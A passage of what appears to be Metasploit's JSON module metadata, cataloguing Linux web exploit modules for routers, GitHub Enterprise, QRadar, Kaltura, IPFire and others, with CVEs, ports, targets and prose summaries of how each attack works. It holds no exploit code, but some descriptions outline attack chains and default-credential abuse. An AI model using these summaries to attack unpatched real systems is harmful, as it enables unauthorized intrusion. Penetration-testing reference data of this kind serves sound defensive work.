"name": "Fritz!Box Webcm Unauthenticated Command Injection",
"full_name": "exploit/linux/http/fritzbox_echo_exec",
"rank": 600,
"disclosure_date": "2014-02-11",
"type": "exploit",
"author": [
"Unknown",
"Fabian Braeunlein <fabian@breaking.systems>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.\n This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the\n following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,\n 7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,\n 6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270",
"references": [
"CVE-2014-9727",
"OSVDB-103289",
"BID-65520",
"URL-http://www.kapple.de/?p=75",
"URL-https://www.speckmarschall.de/hoere.htm",
"URL-http://pastebin.com/GnMKGmZ2",
"URL-http://www.avm.de/en/Sicherheit/update_list.html",
"URL-http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/linux/http/fritzbox_echo_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/fritzbox_echo_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/github_enterprise_secret": {
"name": "Github Enterprise Default Session Secret And Deserialization Vulnerability",
"full_name": "exploit/linux/http/github_enterprise_secret",
"rank": 600,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"iblue <iblue@exablue.de>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.\n The first is that the session management uses a hard-coded secret value, which can be\n abused to sign a serialized malicious Ruby object. The second problem is due to the\n use of unsafe deserialization, which allows the malicious Ruby object to be loaded,\n and results in arbitrary remote code execution.\n\n This exploit was tested against version 2.8.0.",
"references": [
"EDB-41616",
"URL-http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html",
"URL-https://enterprise.github.com/releases/2.8.7/notes"
],
"platform": "Linux",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Github Enterprise 2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/github_enterprise_secret.rb",
"is_install_path": true,
"ref_name": "linux/http/github_enterprise_secret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/gitlist_exec": {
"name": "Gitlist Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/gitlist_exec",
"rank": 600,
"disclosure_date": "2014-06-30",
"type": "exploit",
"author": [
"drone",
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution vulnerability\n in version 0.4.0 of Gitlist. The problem exists in the handling of a specially\n crafted file name when trying to blame it.",
"references": [
"CVE-2014-4511",
"EDB-33929",
"URL-http://hatriot.github.io/blog/2014/06/29/gitlist-rce/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Gitlist 0.4.0"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/gitlist_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/gitlist_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/goahead_ldpreload": {
"name": "GoAhead Web Server LD_PRELOAD Arbitrary Module Load",
"full_name": "exploit/linux/http/goahead_ldpreload",
"rank": 600,
"disclosure_date": "2017-12-18",
"type": "exploit",
"author": [
"Daniel Hodson <daniel@elttam.com.au>",
"h00die",
"hdm <x@hdm.io>"
],
"description": "This module triggers an arbitrary shared library load vulnerability\n in GoAhead web server versions between 2.5 and that have the CGI module\n enabled.",
"references": [
"CVE-2017-17562",
"URL-https://www.elttam.com.au/blog/goahead/"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Reverse Shell)",
"Automatic (Bind Shell)",
"Automatic (Command)",
"Linux x86",
"Linux x86_64",
"Linux ARM (LE)",
"Linux ARM64",
"Linux MIPS",
"Linux MIPSLE",
"Linux MIPS64",
"Linux MIPS64LE",
"Linux SPARC",
"Linux SPARC64",
"Linux s390x"
],
"mod_time": "2017-12-29 16:17:53 +0000",
"path": "/modules/exploits/linux/http/goahead_ldpreload.rb",
"is_install_path": true,
"ref_name": "linux/http/goahead_ldpreload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/goautodial_3_rce_command_injection": {
"name": "GoAutoDial 3.3 Authentication Bypass / Command Injection",
"full_name": "exploit/linux/http/goautodial_3_rce_command_injection",
"rank": 600,
"disclosure_date": "2015-04-21",
"type": "exploit",
"author": [
"Chris McCurley"
],
"description": "This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges.\n\n This module has been tested successfully on GoAutoDial version 3.3-1406088000.",
"references": [
"CVE-2015-2843",
"CVE-2015-2845"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/goautodial_3_rce_command_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/gpsd_format_string": {
"name": "Berlios GPSD Format String Vulnerability",
"full_name": "exploit/linux/http/gpsd_format_string",
"rank": 200,
"disclosure_date": "2005-05-25",
"type": "exploit",
"author": [
"Yann Senotier <yann.senotier@cyber-networks.fr>"
],
"description": "This module exploits a format string vulnerability in the Berlios GPSD server.\n This vulnerability was discovered by Kevin Finisterre.",
"references": [
"CVE-2004-1388",
"OSVDB-13199",
"BID-12371",
"URL-http://www.securiteam.com/unixfocus/5LP0M1PEKK.html"
],
"platform": "Linux",
"arch": "x86",
"rport": 2947,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"gpsd-1.91-1.i386.rpm",
"gpsd-1.92-1.i386.rpm",
"gpsd-1.93-1.i386.rpm",
"gpsd-1.94-1.i386.rpm",
"gpsd-1.95-1.i386.rpm",
"gpsd-1.96-1.i386.rpm",
"gpsd-1.97-1.i386.rpm",
"gpsd-2.1-1.i386.rpm",
"gpsd-2.2-1.i386.rpm",
"gpsd-2.3-1.i386.rpm",
"gpsd-2.4-1.i386.rpm",
"gpsd-2.5-1.i386.rpm",
"gpsd-2.6-1.i386.rpm",
"gpsd-2.7-1.i386.rpm",
"gpsd_2.6-1_i386.deb",
"gpsd_2.7-1_i386.deb",
"gpsd_2.7-2_i386.deb",
"SuSE 9.1 compiled 2.0",
"Slackware 9.0 compiled 2.0",
"Slackware 9.0 compiled 2.7",
"Debug "
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/gpsd_format_string.rb",
"is_install_path": true,
"ref_name": "linux/http/gpsd_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/groundwork_monarch_cmd_exec": {
"name": "GroundWork monarch_scan.cgi OS Command Injection",
"full_name": "exploit/linux/http/groundwork_monarch_cmd_exec",
"rank": 600,
"disclosure_date": "2013-03-08",
"type": "exploit",
"author": [
"Johannes Greil",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in GroundWork 6.7.0. This software\n is used for network, application and cloud monitoring. The vulnerability exists in\n the monarch_scan.cgi where user controlled input is used in the perl qx function.\n This allows any remote authenticated attacker, regardless of privileges, to\n inject system commands and gain arbitrary code execution. The module has been tested\n successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04\n based VM appliance.",
"references": [
"CVE-2013-3502",
"OSVDB-91051",
"US-CERT-VU-345260",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GroundWork 6.7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/groundwork_monarch_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/hadoop_unauth_exec": {
"name": "Hadoop YARN ResourceManager Unauthenticated Command Execution",
"full_name": "exploit/linux/http/hadoop_unauth_exec",
"rank": 600,
"disclosure_date": "2016-10-19",
"type": "exploit",
"author": [
"cbmixx",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.",
"references": [
"URL-http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf",
"URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 8088,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-03 01:39:37 +0000",
"path": "/modules/exploits/linux/http/hadoop_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/hadoop_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/hp_system_management": {
"name": "HP System Management Anonymous Access Code Execution",
"full_name": "exploit/linux/http/hp_system_management",
"rank": 300,
"disclosure_date": "2012-09-01",
"type": "exploit",
"author": [
"agix"
],
"description": "This module exploits an anonymous remote code execution on HP System Management\n 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on\n a request against /proxy/DataValidation. In order to work HP System Management must\n be configured with Anonymous access enabled.",
"references": [
"OSVDB-91812"
],
"platform": "Linux",
"arch": "x86",
"rport": 2381,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP System Management 7.1.1 - Linux (CentOS)",
"HP System Management 6.3.0 - Linux (CentOS)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/hp_system_management.rb",
"is_install_path": true,
"ref_name": "linux/http/hp_system_management",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/hp_van_sdn_cmd_inject": {
"name": "HP VAN SDN Controller Root Command Injection",
"full_name": "exploit/linux/http/hp_van_sdn_cmd_inject",
"rank": 600,
"disclosure_date": "2018-06-25",
"type": "exploit",
"author": [
"Matt Bergin",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a hardcoded service token or default credentials\n in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.\n\n A root command injection was discovered in the uninstall action's name\n parameter, obviating the need to use sudo for privilege escalation.\n\n If the service token option TOKEN is blank, USERNAME and PASSWORD will\n be used for authentication. An additional login request will be sent.",
"references": [
"EDB-44951",
"URL-https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2018-12-13 12:01:43 +0000",
"path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb",
"is_install_path": true,
"ref_name": "linux/http/hp_van_sdn_cmd_inject",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/huawei_hg532n_cmdinject": {
"name": "Huawei HG532n Command Injection",
"full_name": "exploit/linux/http/huawei_hg532n_cmdinject",
"rank": 600,
"disclosure_date": "2017-04-15",
"type": "exploit",
"author": [
"Ahmed S. Darwish <darwish.07@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in the Huawei\n HG532n routers provided by TE-Data Egypt, leading to a root shell.\n\n The router's web interface has two kinds of logins, a \"limited\" user:user\n login given to all customers and an admin mode. The limited mode is used\n here to expose the router's telnet port to the outside world through NAT\n port-forwarding.\n\n With telnet now remotely accessible, the router's limited \"ATP command\n line tool\" (served over telnet) can be upgraded to a root shell through\n an injection into the ATP's hidden \"ping\" command.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/8245"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsbe Payload"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/huawei_hg532n_cmdinject",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/ibm_qradar_unauth_rce": {
"name": "IBM QRadar SIEM Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/ibm_qradar_unauth_rce",
"rank": 600,
"disclosure_date": "2018-05-28",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "IBM QRadar SIEM has three vulnerabilities in the Forensics web application\n that when chained together allow an attacker to achieve unauthenticated remote code execution.\n\n The first stage bypasses authentication by fixating session cookies.\n The second stage uses those authenticated sessions cookies to write a file to disk and execute\n that file as the \"nobody\" user.\n The third and final stage occurs when the file executed as \"nobody\" writes an entry into the\n database that causes QRadar to execute a shell script controlled by the attacker as root within\n the next minute.\n Details about these vulnerabilities can be found in the advisories listed in References.\n\n The Forensics web application is disabled in QRadar Community Edition, but the code still works,\n so these vulnerabilities can be exploited in all flavours of QRadar.\n This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. IBM has confirmed versions up to 7.2.8\n patch 12 and 7.3.1 patch 3 are vulnerable.\n Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload.",
"references": [
"CVE-2016-9722",
"CVE-2018-1418",
"CVE-2018-1612",
"URL-https://blogs.securiteam.com/index.php/archives/3689",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt",
"URL-https://seclists.org/fulldisclosure/2018/May/54",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg22015797"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/ibm_qradar_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/imperva_securesphere_exec": {
"name": "Imperva SecureSphere PWS Command Injection",
"full_name": "exploit/linux/http/imperva_securesphere_exec",
"rank": 600,
"disclosure_date": "2018-10-08",
"type": "exploit",
"author": [
"rsp3ar <lukunming<at>gmail.com"
],
"description": "This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs didn't properly sanitize user supplied command\n parameters and directly passes them to corresponding CLI utility,\n leading to command injection. Agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.",
"references": [
"EDB-45542"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Imperva SecureSphere 13.0/13.1/13.2"
],
"mod_time": "2019-03-05 21:57:42 +0000",
"path": "/modules/exploits/linux/http/imperva_securesphere_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/imperva_securesphere_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/ipfire_bashbug_exec": {
"name": "IPFire Bash Environment Variable Injection (Shellshock)",
"full_name": "exploit/linux/http/ipfire_bashbug_exec",
"rank": 600,
"disclosure_date": "2014-09-29",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"Claudio Viviani"
],
"description": "IPFire, a free linux based open source firewall distribution,\n version <= 2.15 Update Core 82 contains an authenticated remote\n command execution vulnerability via shellshock in the request headers.",
"references": [
"EDB-34839",
"CVE-2014-6271"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/linux/http/ipfire_bashbug_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_bashbug_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_linux/http/ipfire_oinkcode_exec": {
"name": "IPFire proxy.cgi RCE",
"full_name": "exploit/linux/http/ipfire_oinkcode_exec",
"rank": 600,
"disclosure_date": "2017-06-09",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"0x09AL"
],
"description": "IPFire, a free linux based open source firewall distribution,\n version < 2.19 Update Core 110 contains a remote command execution\n vulnerability in the ids.cgi page in the OINKCODE field.",
"references": [
"CVE-2017-9757",
"EDB-42149"
],
"platform": "Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/ipfire_oinkcode_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_oinkcode_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/ipfire_proxy_exec": {
"name": "IPFire proxy.cgi RCE",
"full_name": "exploit/linux/http/ipfire_proxy_exec",
"rank": 600,
"disclosure_date": "2016-05-04",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"Yann CAM"
],
"description": "IPFire, a free linux based open source firewall distribution,\n version < 2.19 Update Core 101 contains a remote command execution\n vulnerability in the proxy.cgi page.",
"references": [
"EDB-39765",
"URL-www.ipfire.org/news/ipfire-2-19-core-update-101-released"
],
"platform": "Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/ipfire_proxy_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_proxy_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/kaltura_unserialize_cookie_rce": {
"name": "Kaltura Remote PHP Code Execution over Cookie",
"full_name": "exploit/linux/http/kaltura_unserialize_cookie_rce",
"rank": 600,
"disclosure_date": "2017-09-12",
"type": "exploit",
"author": [
"Robin Verton <hello@robinverton.de>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits an Object Injection vulnerability in Kaltura.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the context of the web server user.\n\n Kaltura makes use of a hardcoded cookie secret which allows to sign\n arbitrary cookie data. After passing this signature check, the base64-\n decoded data is passed to PHPs unserialize() function which allows for\n code execution. The constructed object is again based on the SektionEins\n Zend code execution POP chain PoC. Kaltura versions prior to 13.1.0 are\n affected by this issue.\n\n A valid entry_id (which is required for this exploit) can be obtained\n from any media resource published on the kaltura installation.\n\n This module was tested against Kaltura 13.1.0-2 installed on Ubuntu 14.04.",
"references": [
"CVE-2017-14143"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-21 14:30:13 +0000",
"path": "/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kaltura_unserialize_cookie_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/kaltura_unserialize_rce": {
"name": "Kaltura Remote PHP Code Execution",
"full_name": "exploit/linux/http/kaltura_unserialize_rce",
"rank": 600,
"disclosure_date": "2016-03-15",
"type": "exploit",
"author": [
"Security-Assessment.com",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits an Object Injection vulnerability in Kaltura.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the context of the web server user.\n\n Kaltura has a module named keditorservices that takes user input\n and then uses it as an unserialized function parameter. The constructed\n object is based on the SektionEins Zend code execution POP chain PoC,\n with a minor modification to ensure Kaltura processes it and the\n Zend_Log function's __destruct() method is called. Kaltura versions\n prior to 11.1.0-2 are affected by this issue.\n\n This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.",
"references": [
"EDB-39563"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/kaltura_unserialize_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kaltura_unserialize_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/kloxo_sqli": {
"name": "Kloxo SQL Injection and Remote Code Execution",
"full_name": "exploit/linux/http/kloxo_sqli",
"rank": 0,
"disclosure_date": "2014-01-28",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting Kloxo, as\n exploited in the wild on January 2014. The SQL injection issue can be abused in order to\n retrieve the Kloxo admin cleartext password from the database. With admin access to the\n web control panel, remote PHP code execution can be achieved by abusing the Command Center\n function. The module tries to find the first server in the tree view, unless the server\n information is provided, in which case it executes the payload there.",
"references": [
"URL-https://vpsboard.com/topic/3384-kloxo-installations-compromised/",
"URL-http://www.webhostingtalk.com/showthread.php?p=8996984",
"URL-http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7778,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kloxo / CentOS"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/kloxo_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/kloxo_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/lifesize_uvc_ping_rce": {
"name": "LifeSize UVC Authenticated RCE via Ping",
"full_name": "exploit/linux/http/lifesize_uvc_ping_rce",
"rank": 600,
"disclosure_date": "2014-03-21",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "When authenticated as an administrator on LifeSize UVC 1.2.6, an attacker\n can abuse the ping diagnostic functionality to achieve remote command\n execution as the www-data user (or equivalent).",
"references": [
"EDB-32437"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LifeSize UVC version <= 1.2.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/lifesize_uvc_ping_rce",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_apply_cgi": {
"name": "Linksys WRT54 Access Point apply.cgi Buffer Overflow",
"full_name": "exploit/linux/http/linksys_apply_cgi",
"rank": 500,
"disclosure_date": "2005-09-13",
"type": "exploit",
"author": [
"Raphael Rigo <devel-metasploit@syscall.eu>",
"Julien Tinnes <julien@cr0.org>"
],
"description": "This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.\n According to iDefense who discovered this vulnerability, all WRT54G versions prior to\n 4.20.7 and all WRT54GS version prior to 1.05.2 may be affected.",
"references": [
"CVE-2005-2799",
"OSVDB-19389",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic",
"Version 1.42.2",
"Version 2.02.6beta1",
"Version 2.02.7_ETSI",
"Version 3.03.6",
"Version 4.00.7",
"Version 4.20.06"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/linksys_apply_cgi.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_apply_cgi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/linksys_e1500_apply_exec": {
"name": "Linksys E1500/E2500 apply.cgi Remote Command Injection",
"full_name": "exploit/linux/http/linksys_e1500_apply_exec",
"rank": 600,
"disclosure_date": "2013-02-05",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. A ping command against a\n controlled system could be used for testing purposes.",
"references": [
"BID-57760",
"EDB-24475",
"OSVDB-89912",
"URL-http://www.s3cur1ty.de/m1adv2013-004"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/linksys_e1500_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_e1500_apply_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_themoon_exec": {
"name": "Linksys E-Series TheMoon Remote Command Injection",
"full_name": "exploit/linux/http/linksys_themoon_exec",
"rank": 600,
"disclosure_date": "2014-02-13",
"type": "exploit",
"author": [
"Johannes Ullrich",
"Rew",
"infodox",
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command\n injection. This vulnerability was used from the so-called \"TheMoon\" worm. There\n are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,\n E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested\n successfully against an E1500 v1.0.5.",
"references": [
"EDB-31683",
"BID-65585",
"OSVDB-103321",
"PACKETSTORM-125253",
"PACKETSTORM-125252",
"URL-https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633",
"URL-https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsel Payload",
"Linux mipsbe Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/linksys_themoon_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_themoon_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/linksys_wrt110_cmd_exec": {
"name": "Linksys Devices pingstr Remote Command Injection",
"full_name": "exploit/linux/http/linksys_wrt110_cmd_exec",
"rank": 600,
"disclosure_date": "2013-07-12",
"type": "exploit",
"author": [
"Craig Young",
"joev <joev@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
